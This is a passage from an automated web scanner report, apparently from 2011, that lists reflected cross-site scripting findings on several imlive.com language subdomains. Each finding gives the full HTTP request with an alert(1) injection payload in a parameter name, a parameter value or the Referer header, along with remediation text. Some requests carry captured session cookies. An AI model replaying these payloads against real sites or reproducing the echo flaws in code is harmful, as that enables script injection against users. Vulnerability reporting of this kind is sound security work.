Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;"> ...[SNIP]...
2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://se.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:34 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv ...[SNIP]...
2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 40625
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /SiteInformation.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
